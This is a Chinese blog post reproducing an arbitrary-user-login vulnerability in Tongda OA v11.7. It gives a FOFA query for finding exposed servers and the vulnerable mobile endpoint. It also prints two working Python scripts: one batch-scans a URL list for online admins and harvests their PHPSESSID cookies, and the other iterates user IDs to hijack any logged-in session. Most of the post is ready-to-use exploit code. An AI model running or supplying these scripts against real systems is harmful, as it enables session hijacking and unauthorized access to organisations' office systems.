【漏洞復現】通達OA v11.7 在線任意用戶登錄漏洞

0x00 前言

通達OA V11.7版本存在這任意用戶登錄漏洞，該漏洞需要管理員在線才可以登錄系統，另外一個方面就是編譯在線的uid值進行判斷。

具體fofa語法放在下面：

app="TDXK-通達OA"

0x01 在線用戶判斷

訪問 ：

http://xxx. xxx . xxx . xxx /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0

如果頁面時空白的，則說明管理員在線，即可以利用

如果顯示RELOGIN，則不可以利用

0x02 任意用戶登錄

獲取到uid=1的cookie

同時訪問即可進行登錄后台：

http://127.0.0.1/general/

0x03 POC檢測腳本

通過遍歷uid的值，判斷用戶是否上線過，實現任意用戶登錄，同時該謝大佬腳本，更改了一下批量測試腳本：

import requests
import sys
import random
import re
import time
import threading
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print('+------------------------------------------')
    print('+  \033[34mVersion: 通達OA 11.7            ')
    print('+  \033[34mVersion: 用法：python3 poc.py http://xxx.xxx.xxx.xxx/            ')
    print('+------------------------------------------')

def POC_1(target_url):
    vuln_url = target_url + "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
        if "RELOGIN" in response.text and response.status_code == 200:
            print(target_url.replace("\n","") +"\033[31m[x] 目標用戶為下線狀態 --- {}\033[0m".format(time.asctime( time.localtime(time.time()))))
        elif response.status_code == 200 and response.text == "":
            PHPSESSION = re.findall(r'PHPSESSID=(.*?);', str(response.headers))
            print(target_url.replace("\n","") + "\033[32m[o] 用戶上線 PHPSESSION: {} --- {}\033[0m".format(PHPSESSION[0] ,time.asctime(time.localtime(time.time()))))
        else:
            print("\033[31m[x] 請求失敗，目標可能不存在漏洞")
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 請求失敗 \033[0m", e)

if __name__ == '__main__':
    title()
    # target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    # while True:
    #     POC_1(target_url)
    #     time.sleep(5)

    # 批量檢測
    for url in open("url.txt"):
        # POC_1(url)
        t1 = threading.Thread(target=POC_1, args=(url.replace("\n", ""),))
        t1.start()

網上師傅的腳本：

import requests
from bs4 import BeautifulSoup
import sys
import re

url = sys.argv[1]
for i in range(1,10000):
    try :
        vuln_url = url + "/mobile/auth_mobi.php?isAvatar=1&uid="+str(i)+"&P_VER=0"
        resp = requests.get(vuln_url)
        soup = BeautifulSoup(resp.text,'html.parser')
    
        if 'RELOGIN' in soup.get_text():
            print("不存在")
        else:
            PHPSESSION = re.findall(r'PHPSESSID=(.*?);', str(resp.headers))
            print('uid='+str(i)+"在線"+"對應的COOKIE值是：PHPSESSID="+str(PHPSESSION[0]))
            break
    except:
        break

轉載請注明：Adminxe's Blog » 【漏洞復現】通達OA v11.7 在線任意用戶登錄漏洞